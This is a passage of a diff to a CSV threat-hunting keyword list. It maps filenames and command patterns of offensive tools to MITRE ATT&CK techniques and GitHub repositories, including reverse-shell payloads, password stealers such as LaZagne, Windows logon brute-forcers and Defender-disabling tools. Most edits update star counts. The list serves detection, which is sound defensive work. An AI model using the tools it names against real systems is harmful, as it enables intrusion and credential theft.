tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*wifite2.git*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" "*win_chrome_password_extractor.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" -"*win_fake_malware.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*win_fake_malware.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*win_keylogger.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*win_rev_http.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*win_rev_https.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*win_rev_tcp.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*win_wlan_passwd_and_wanip_extractor.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" -"*Win32.LaZagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*win32_stage_boot_reverse_shell_revert.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*win32_stage_uploadexec.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*win32_stage_winexec.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Win32kLeaker.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Win64.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*Win7Elevate.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Win7ElevateDll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*WinBruteLogon* -v -u*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" -"*WinBruteLogon.dpr*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" -"*WinBruteLogon.dproj*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" -"*WinBruteLogon.exe*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" -"*WinBruteLogon.res*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" -"*WinCreds.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Win32.LaZagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*win32_stage_boot_reverse_shell_revert.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*win32_stage_uploadexec.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*win32_stage_winexec.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Win32kLeaker.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Win64.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Win7Elevate.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Win7ElevateDll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*WinBruteLogon* -v -u*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinBruteLogon.dpr*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinBruteLogon.dproj*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinBruteLogon.exe*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinBruteLogon.res*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*WinCreds.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*windapsearch --dc *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*windapsearch.py*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","1","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" -"*windapsearch_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*windapsearch_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*windapsearch_py2.py*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","1","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "*windapsearch-master*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","1","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" "*WinDefenderKiller*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "*winDefKiller.exe*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" -"*WindfarmDynamite.cdproj*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*WindfarmDynamite.exe*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*WindfarmDynamite.sln*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*WindfarmDynamite.cdproj*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*WindfarmDynamite.exe*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*WindfarmDynamite.sln*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*Windows Exploit*","offensive_tool_keyword","_","windows exploit keyword often used in poc exploit github repo or could be a file name or folder","T1068 - T1070 - T1071 - T1078 - T1085 - T1090 - T1105 - T1112 - T1134 - T1135 - T1136 - T1203 - T1210 - T1211 - T1218 - T1222 - T1247 - T1499 - T1505 - T1526 - T1547 - T1548 - T1550 - T1553 - T1574 - T1583 - T1584 - T1587 - T1588 - T1590 - T1591 - T1592 - T1596 - T1600","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*windows*lsa_secrets.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*windows/c_payload_util*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Windows/lazagne.spec*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*windows/shell_reverse_tcp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*windows/x64/meterpreter_reverse_tcp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*windows*lsa_secrets.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential 